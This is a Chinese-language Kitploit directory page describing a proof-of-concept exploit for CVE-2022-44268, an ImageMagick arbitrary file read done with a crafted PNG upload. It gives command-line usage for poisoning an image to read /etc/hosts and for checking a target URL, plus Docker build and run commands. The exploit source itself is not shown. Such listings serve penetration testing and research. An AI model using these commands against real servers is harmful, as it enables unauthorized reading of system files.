Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-44268 — 针对 CVE-2022-44268 的概念验证漏洞利用程序,可通过恶意构造的 PNG 图片上传至存在漏洞的 ImageMagick 实例,实现任意文件读取。包含 Docker 支持及基于 URL 的文件提取功能。 | Kitploit
工具/GitHubGitHub/kljunowsky/cve-2022-44268
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHubkljunowsky/cve-2022-44268

CVE-2022-44268

针对 CVE-2022-44268 的概念验证漏洞利用程序,可通过恶意构造的 PNG 图片上传至存在漏洞的 ImageMagick 实例,实现任意文件读取。包含 Docker 支持及基于 URL 的文件提取功能。

查看仓库
27822年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-44268 🧙‍♂️

CVE-2022-44268 ImageMagick 任意文件读取 - 概念验证漏洞利用代码

视频 📼

https://youtu.be/quKxwNAMBIA

使用方式 🛠

毒化图像 ☣️

root@kitploit:~
python3 CVE-2022-44268.py --image imagetopoison.png --file-to-read /etc/hosts --output poisoned.png
root@kitploit:~
Upload poisoned PNG image.

检查漏洞利用是否成功 🗡

root@kitploit:~
python3 CVE-2022-44268.py --url http://vulnerable-imagemagick.com/uploads/vulnerable.png

从 Docker 运行 🐳

构建

root@kitploit:~
docker build -t cve-2022-44268 .

运行

root@kitploit:~
docker run -v $(pwd)/data:/data -ti cve-2022-44268 --image /data/random.png --file-to-read "/etc/hosts" --output /data/poisoned.png

参数 🧰

参数描述

联系我 📇

Twitter - Milan Jovic

LinkedIn - Milan Jovic

仅供教育目的,不得用于违法或谋取私利。

本项目作者不对因本项目材料造成的任何可能的损害负责。

更多详情:https://www.metabaseq.com/imagemagick-zero-days/

下载工具
类型
--url已上传 PNG 图片的 URL字符串
--image输入 PNG 文件文件
--output输出 PNG 文件文件
--file-to-read要从易受攻击主机读取的文件字符串